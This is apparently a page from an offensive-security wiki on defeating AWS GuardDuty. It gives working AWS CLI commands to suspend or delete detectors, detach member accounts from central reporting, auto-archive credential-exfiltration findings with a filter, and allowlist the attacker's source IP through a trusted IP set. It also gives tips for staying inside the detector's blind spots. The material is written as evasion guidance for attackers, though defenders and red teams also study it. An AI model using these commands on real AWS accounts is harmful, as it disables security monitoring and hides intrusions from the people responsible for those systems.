GuardDuty

GuardDuty scores CloudTrail, VPC flow, and DNS activity for known-bad behavior. It is defeated two ways: switch it off (loud, and itself a finding), or stay inside its blind spots so it never fires.

Disable or delete the detector#

bash
aws guardduty list-detectors
aws guardduty update-detector --detector-id <id> --no-enable      # suspend analysis
aws guardduty delete-detector --detector-id <id>                  # remove entirely
# in a delegated-admin setup, cut a member loose from central reporting
aws guardduty disassociate-from-administrator-account --detector-id <id>

Auto-archive the findings you expect to trip#

bash
# a filter with ARCHIVE silently files matching findings away from the console
aws guardduty create-filter --detector-id <id> --name quiet --action ARCHIVE \
  --finding-criteria '{"Criterion":{"type":{"Eq":["UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration"]}}}'

Allowlist your source IP#

GuardDuty suppresses findings that originate from a trusted IP set. Uploading one that contains your source address quietly removes a whole class of findings without the detector ever looking disabled:

bash
# a trusted IP list (one CIDR per line in the S3 object) excludes those IPs from analysis
aws guardduty create-ip-set --detector-id <id> --name ops --format TXT \
  --location https://s3.amazonaws.com/<bucket>/trusted.txt --activate

Stay in the blind spots#

  • Call the API from inside the account's expected regions and from an EC2 role rather than external keys, so credential-exfiltration analytics do not trip.
  • Avoid Tor, known-malicious IPs, and the GeneratedFindingFor pentest patterns GuardDuty ships sample rules for.
  • Use IMDSv2 and existing roles instead of patterns that match InstanceCredentialExfiltration.

Exploitation notes#

  • Disabling or deleting a detector is a management event CloudTrail records, so pair it with the CloudTrail work or expect it to surface.
  • Filters are quieter than deletion: the service stays "enabled" while the findings you generate are archived out of view.
  • GuardDuty is regional; a detector exists per region, so enumerate and handle each region in scope.

Tools#

  • AWS CLI (guardduty): detector and filter control.
  • Pacu (detection__enum_services, detection__disruption): find and disable detection services.
  • Stratus Red Team: GuardDuty detector-deletion detonation.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more